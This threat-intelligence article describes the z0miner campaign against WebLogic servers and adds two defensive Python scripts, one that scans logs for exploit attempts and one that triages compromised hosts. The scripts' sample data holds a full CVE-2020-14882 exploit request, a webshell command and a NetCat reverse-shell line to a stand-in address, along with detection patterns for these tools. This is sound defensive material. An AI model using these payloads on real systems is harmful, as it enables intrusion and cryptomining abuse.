Recent analysis attributes a sustained campaign against Korean Oracle WebLogic servers to a group tracked as “z0miner”, which deploys a mix of cryptocurrency-mining and remote-control tooling once it is inside. The intrusion chain is consistent: exploit a known vulnerability on an exposed server, plant JSP webshells, then bring in further tools to keep control of the compromised host. The campaign illustrates how much exposed, business-critical infrastructure in the region remains within reach of opportunistic attackers.
z0miner goes after WebLogic instances with weak configurations and administrative interfaces reachable from the internet, fingerprinting server versions to pick targets its exploit tooling can handle. Initial access comes through CVE-2020-14882, an unauthenticated remote code execution flaw in the WebLogic administration console that Oracle patched in its October 2020 Critical Patch Update. The group uses it to write a JSP webshell onto the server and begins controlling the host through it. Three different webshell variants were observed, and none of them was detected by the security software running on the compromised servers.
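As an added illustration of the initial-access step described above (example code written for this page, not code from the article or from any vendor report), the following Python script flags CVE-2020-14882 exploitation attempts in WebLogic HTTP access logs and correlates later webshell-style JSP requests from the same source. It relies on the publicly documented shape of the exploit: a request into the administration console that uses double URL-encoded `..` to reach `console.portal` from a path exempt from authentication, carrying a `handle=` parameter that names a gadget class. The log lines, the source addresses (documentation ranges) and the `sh.jsp` path are constructed for the example.

```python
"""Flag CVE-2020-14882 exploitation attempts in WebLogic access logs.

Added example, not code from the article or any vendor report. The log
lines in SAMPLE_LOG are constructed; 203.0.113.x and 198.51.100.x are
documentation addresses standing in for an attacker and a normal client.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Common Log Format: host ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Gadget classes named in public CVE-2020-14882 write-ups.
GADGET_RE = re.compile(
    r'com\.tangosol\.coherence\.mvel2\.sh\.ShellSession|'
    r'com\.bea\.core\.repackaged\.springframework\.context\.support\.'
    r'FileSystemXmlApplicationContext'
)


def decode_twice(target):
    """The exploit double-encodes the traversal (%252e%252e%252f -> %2e%2e%2f
    -> ../) so the console's path-based auth check sees a harmless path."""
    return unquote(unquote(target))


def inspect_request(target):
    """Return the CVE-2020-14882 indicators present in one request target."""
    parts = urlsplit(decode_twice(target))
    path = parts.path
    indicators = []
    if (path.lower().startswith("/console/") and "/../" in path
            and path.lower().endswith("console.portal")):
        indicators.append("traversal to console.portal")
    handle = " ".join(parse_qs(parts.query).get("handle", []))
    if GADGET_RE.search(handle):
        indicators.append("exploit gadget in handle=")
    return indicators


def scan_log(lines):
    """Scan access-log lines in order. A source that sent an exploit request
    is remembered, and its later requests to any .jsp are flagged as possible
    webshell interaction (webshells are driven over HTTP)."""
    suspects = set()
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        src, target, status = m.group("src", "target", "status")
        indicators = inspect_request(target)
        if indicators:
            suspects.add(src)
        elif src in suspects and urlsplit(decode_twice(target)).path.lower().endswith(".jsp"):
            indicators.append("JSP requested after exploit attempt (possible webshell)")
        if indicators:
            alerts.append({"src": src, "time": m.group("time"),
                           "status": int(status), "target": target,
                           "indicators": indicators})
    return alerts


# Constructed sample: a normal console login page hit, the exploit request,
# a follow-up request to a dropped JSP, and an unrelated client.
SAMPLE_LOG = [
    '203.0.113.10 - - [14/Mar/2024:09:12:01 +0900] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1812',
    '203.0.113.10 - - [14/Mar/2024:09:12:03 +0900] "GET /console/css/%252e%252e%252fconsole.portal'
    '?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession'
    '(%22java.lang.Runtime.getRuntime().exec(%27id%27)%22) HTTP/1.1" 200 3121',
    '203.0.113.10 - - [14/Mar/2024:09:12:09 +0900] "GET /console/framework/skins/wlsconsole/images/sh.jsp?cmd=whoami HTTP/1.1" 200 56',
    '198.51.100.7 - - [14/Mar/2024:09:13:00 +0900] "GET /console/css/console.css HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["src"], alert["time"], alert["status"], ", ".join(alert["indicators"]))
```

Decoding twice before matching is the point: a single-decode signature sees `/console/css/%2e%2e%2fconsole.portal` and never spots the traversal, which is exactly why the console's own check missed it. Run the script against a real access log by feeding the file's lines to `scan_log`; a 200 response on the exploit request is the strongest sign the server is unpatched.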
Once inside, z0miner brings in additional tooling. FRP (Fast Reverse Proxy) tunnels through the network perimeter so the attackers can reach internal services such as remote desktop from outside. NetCat gives them a channel for sending commands to the compromised servers, and XMRig mines cryptocurrency on the servers' CPUs for the group's profit. Notably, the group also abuses AnyDesk, a legitimate remote-access product, on systems it reaches through a different vulnerability, CVE-2023-46604 in Apache ActiveMQ, a deserialization flaw in the OpenWire protocol handler that allows remote code execution.
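The tools named above are routinely renamed on disk, so a host-side check should look at command lines, process ancestry and outbound connections rather than binary names. The following Python triage routine is an added example written for this page (not code from the article or any vendor report): it takes a process listing and a connection table, flags FRP, NetCat-with-exec, XMRig-style miner and AnyDesk indicators, raises severity when a process runs as the WebLogic service account or talks to an external address, and separately flags any shell spawned directly by the JVM, which is how a JSP webshell executes commands. The service account name `weblogic`, the process data and the 198.51.100.x addresses are assumptions constructed for the example.

```python
"""Triage post-exploitation tooling on a WebLogic host.

Added example, not code from the article or any vendor report. The process
and connection samples are constructed; 198.51.100.23 (a documentation
address) stands in for attacker infrastructure.
"""
import ipaddress
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    user: str
    args: str


@dataclass
class Conn:
    pid: int
    raddr: str
    rport: int


SERVICE_USER = "weblogic"  # assumed account the WebLogic domain runs as

# Indicators keyed on command-line features, not file names, because the
# binaries are renamed (a miner dropped as "kworkerds" still needs a pool URL).
TOOL_PATTERNS = [
    ("miner (XMRig-style)", re.compile(r'stratum\+(tcp|ssl)://|--donate-level|\bxmrig\b', re.I)),
    ("FRP client", re.compile(r'\bfrpc?\b|frpc\.(ini|toml|yaml)', re.I)),
    ("NetCat with command execution",
     re.compile(r'\b(nc|ncat|netcat)\b.*(\s-[a-z]*e\b|--(sh-)?exec\b)', re.I)),
    ("AnyDesk on a server", re.compile(r'\banydesk\b', re.I)),
]

SHELL_RE = re.compile(r'^(?:/usr)?(?:/bin/)?(?:ba|da|k|z)?sh\b')

# Explicit internal ranges instead of ipaddress.is_private, which also treats
# the documentation ranges used in the sample data as non-global.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_external(addr):
    ip = ipaddress.ip_address(addr)
    return not any(ip in net for net in INTERNAL_NETS)


def triage(procs, conns):
    """Return one finding per suspicious process, in listing order."""
    by_pid = {p.pid: p for p in procs}
    conns_by_pid = {}
    for c in conns:
        conns_by_pid.setdefault(c.pid, []).append(c)
    findings = []
    for p in procs:
        reasons = [name for name, rx in TOOL_PATTERNS if rx.search(p.args)]
        parent = by_pid.get(p.ppid)
        # A shell whose parent is the JVM is the classic webshell footprint.
        if parent and re.search(r'\bjava\b', parent.args) and SHELL_RE.match(p.args):
            reasons.append("shell spawned by the JVM (webshell activity)")
        if not reasons:
            continue
        ext = [c for c in conns_by_pid.get(p.pid, []) if is_external(c.raddr)]
        if ext:
            reasons.append("outbound to %s:%d" % (ext[0].raddr, ext[0].rport))
        severity = "high" if p.user == SERVICE_USER or ext else "medium"
        findings.append({"pid": p.pid, "user": p.user, "severity": severity, "reasons": reasons})
    return findings


# Constructed sample: the AdminServer JVM, a shell it spawned, a renamed miner,
# an FRP client, a NetCat reverse shell, sshd, and AnyDesk under another user.
SAMPLE_PROCS = [
    Proc(1201, 1, "weblogic", "java -Dweblogic.Name=AdminServer weblogic.Server"),
    Proc(4410, 1201, "weblogic", "/bin/sh -c id"),
    Proc(4416, 4410, "weblogic",
         "/tmp/.x/kworkerds -o stratum+tcp://198.51.100.23:3333 -u 4AAAAA --donate-level=1"),
    Proc(4420, 1, "weblogic", "/tmp/.x/frpc -c /tmp/.x/frpc.ini"),
    Proc(4432, 4410, "weblogic", "nc 198.51.100.23 4444 -e /bin/bash"),
    Proc(900, 1, "root", "/usr/sbin/sshd -D"),
    Proc(5100, 1, "root", "/usr/bin/anydesk --service"),
]
SAMPLE_CONNS = [
    Conn(4416, "198.51.100.23", 3333),
    Conn(4420, "198.51.100.23", 7000),
    Conn(4432, "198.51.100.23", 4444),
    Conn(900, "10.0.0.5", 51000),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_PROCS, SAMPLE_CONNS):
        print(f["severity"], f["pid"], f["user"], "; ".join(f["reasons"]))
```

On a live host the inputs come from `ps -eo pid,ppid,user,args` and `ss -tnp` (or the equivalent on Windows); the JVM-spawned-shell rule is worth alerting on by itself, since a production WebLogic server has no routine reason to fork `/bin/sh`.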
The growth in z0miner's activity shows that opportunistic threat actors are becoming more capable, and organisations running critical services need to respond accordingly: apply the fixes for CVE-2020-14882 and CVE-2023-46604 promptly, keep the WebLogic administration console and other management interfaces off the public internet, and monitor servers for the webshells and post-exploitation tools described above. Perimeter81 is cited as one example of a network security product intended to block many of these attack stages and help defend networks against groups like z0miner.
The episode is another reminder that cybercriminals keep probing critical services and, as they grow more capable, move on to new targets. Staying ahead of them is an ongoing effort: exposure reduction, fast patching and layered monitoring together, rather than any single control, are what protect against attack chains of this kind.